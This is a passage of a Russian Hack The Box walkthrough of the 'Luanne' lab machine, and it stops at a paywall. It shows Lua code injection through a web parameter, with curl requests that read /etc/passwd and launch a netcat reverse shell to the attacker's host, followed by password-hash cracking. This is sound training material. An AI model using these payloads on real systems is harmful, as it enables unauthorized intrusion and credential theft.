Сегодня мы разберем тачку под названием Luanne с площадки Hack The Box, а на ее примере я покажу, как эксплуатировать инъекции в код на Lua, обходить директории на веб‑сервере, а также как выполнять привилегированные команды в NetBSD без использования sudo. Уровень сложности — Easy, так что полезно будет в первую очередь новичкам.
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
IP-адрес машины — 10.10.10.218, сразу добавляем его /etc/hosts
для удобства.
10.10.10.218 luanne.htb
Начинаем со сканирования портов. Я, как всегда, использую небольшой скрипт, который запускает Nmap в два этапа: быстрое общее сканирование и затем на обнаруженных портах — сканирование со скриптами.
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr 'n' ',' | sed s/,$//)nmap -p$ports -A $1
В результате сканирования мы узнаем о трех службах:
На SSH нам ловить нечего, так как единственное, что там можно сделать, — это брутфорсить учетные данные. Вместо этого попробуем поискать точку входа на сайте. Однако и на 80-м, и на 9001-м портах нас ожидает HTTP-авторизация, в данном случае — Basic. Поскольку никаких учетных данных у нас вначале нет, это серьезная проблема.
Еще Nmap показал нам наличие файла robots.txt на сервере nginx. Этот файл нужен, чтобы ограничить обход сайта поисковыми роботами (Google, Яндекс и прочими). Иногда в нем можно почерпнуть идеи для развития атаки.
Файл robots.txt состоит из набора инструкций, при помощи которых можно задать файлы, страницы или каталоги сайта, которые не будут индексироваться поисковыми движками. К примеру, сделать так, чтобы в результатах поисковых систем не появлялись страницы авторизации администраторов сайта, файлы или персональная информация со страниц пользователей. Но у любой медали две стороны: злоумышленники и пентестеры, конечно же, сразу заглядывают в этот файл, чтобы узнать, что прячут админы.
Наш случай не исключение. В robots.txt есть директория weather
. Напрямую ее прочесть нельзя, но если сделать перебор по словарю, то мы можем наткнуться на что‑то интересное. Для сканирования я использовал утилиту ffuf. В качестве параметров ей нужно передать список для перебора (опция -w
) и URL (опция -u
). Место в URL, куда будут подставляться слова из списка, отмечается словом FUZZ
.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://luanne.htb/weather/FUZZ/
Мы быстро находим еще один каталог, который вернул код 200, а это значит, что он нам доступен.
Находим каталог forecast
и пробуем зайти туда через браузер. Страница пуста, но если посмотреть исходник ответа, то увидим подсказку.
Требуется указать параметр city
, одно из значений которого может быть list
. Делаем соответствующий запрос и получаем список городов в формате JSON.
Обычно при тестировании веб‑приложений стоит определить три реакции приложения на пользовательский запрос: успешно обработанный запрос, неудачно обработанный запрос и ошибка при обработке запроса. Давай выполним три запроса:
В последнем случае видим ошибку от интерпретатора языка Lua: attempt to call a nil value. Это значит, что наш ввод был подставлен в скрипт без предварительной чистки, а это открывает возможность для инъекции кода.
Lua — скриптовый язык, а значит, нефильтрованные вставки в код очень опасны. Можно вместо значения передать закрывающую кавычку и любой код на Lua — он будет выполнен интерпретатором как родной.
Давай попробуем подобным образом закрыть строку и добавить функцию execute
из модуля os — она выполняет любую команду операционной системы. Дальше добавим объявление переменной и открывающую кавычку, чтобы закрывающая кавычка, идущая в коде дальше, не осталась без пары и не привела к ошибке исполнения. Вот так, к примеру, можно прочитать файл /etc/passwd
:
') os.execute("cat /etc/passwd") x=('
Полный запрос, сделанный командой сurl, будет выглядеть следующим образом:
curl "http://luanne.htb/weather/forecast/?city=London')%20os.execute("cat%20/etc/passwd")%20x%3D('"
Так как команды успешно выполняются, мы можем просто выполнить готовый бэкшелл и получить возможность управлять машиной.
os.execute("rm /tmp/r;mkfifo /tmp/r;cat /tmp/r|/bin/sh -i 2>&1|nc [ip] [port] >/tmp/r")
Этот код должен вызвать коннект на указанный адрес, нужно лишь вписать IP и порт. Но прежде чем запускать эту команду, создадим листенер, который будет принимать это соединение. Я советую использовать rlwrap, это удобная оболочка, которая в числе прочего ведет историю команд. В качестве листенера используем известный netcat.
apt install rlwrap rlwrap nc -lvp [port]
Закодируем нашу нагрузку в URL Encode и выполним запрос. Почти моментально в консоли netcat получаем сообщение об обратном подключении.
curl "http://luanne.htb/weather/forecast/?city=London')%20os%2Eexecute%28%22rm%20%2Ftmp%2Fr%3Bmkfifo%20%2Ftmp%2Fr%3Bcat%20%2Ftmp%2Fr%7C%2Fbin%2Fsh%20%2Di%202%3E%261%7Cnc%2010%2E10%2E14%2E108%204321%20%3E%2Ftmp%2Fr%22%29%20x%3D('"
Команда id
помогает нам узнать, что мы работаем в контексте учетной записи службы _httpd
.
Сначала немного проапгрейдим свой шелл, так как нам может пригодиться оболочка TTY. Ее можно получить с помощью имеющегося в целевой системе интерпретатора Python 3.
python3 -c 'import pty; pty.spawn("/bin/sh")'/bin/bash
Доступ к хосту есть, но для дальнейшего продвижения нам нужны учетные данные пользователей. Не беда — нужно лишь знать места, где их искать. Одно из таких мест — серверная часть сайта. Почти у всех сайтов есть источник учетных данных, в большинстве случаев это БД. То есть атакующий получает доступ к базе данных и извлекает из нее имена пользователей и хеши их паролей.
В нашем случае используется аутентификация HTTP Basic, а это значит, что какие‑то учетные данные получить все же можно. Сначала проверим наличие файла .htpasswd
в рабочей директории веб‑сервера, этот файл содержит имя и хеш пароля пользователя.
Сохраним хеш в файл и переберем его, к примеру, с помощью John The Ripper. В параметрах я указываю словарь с паролями и файл с хешем. «Джон» сам определит алгоритм, выполнит перебор и в случае успеха вернет нам пароль.
john --wordlist=./tools/rockyou.txt web.hash
С этим паролем не получается авторизоваться как пользователь системы, поэтому продолжаем искать. Я подметил, что домашняя пользовательская директория /home/r.michaels
доступна для чтения группе users
, а для локального хоста прослушиваются TCP-порты 3000 и 3001 (это можно узнать командой netstat -ant
).
Чтобы определить, за что отвечают эти порты, подключимся к каждому с помощью netcat и посмотрим, что нам вернут.
nc 127.0.0.1 3000 nc 127.0.0.1 3001
Как видишь, эти порты относятся к веб‑серверу bozotic. Посмотрим, что он нам даст посмотреть в корневом каталоге. Ответ на обоих портах одинаковый — требуется HTTP-авторизация (код 401).
curl 127.0.0.1:3000 curl 127.0.0.1:3001
Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
-35%
1 год9300 рублей 6040 р. |
1 месяц870 р. |
Я уже участник «Xakep.ru»
Читайте также
Последние новости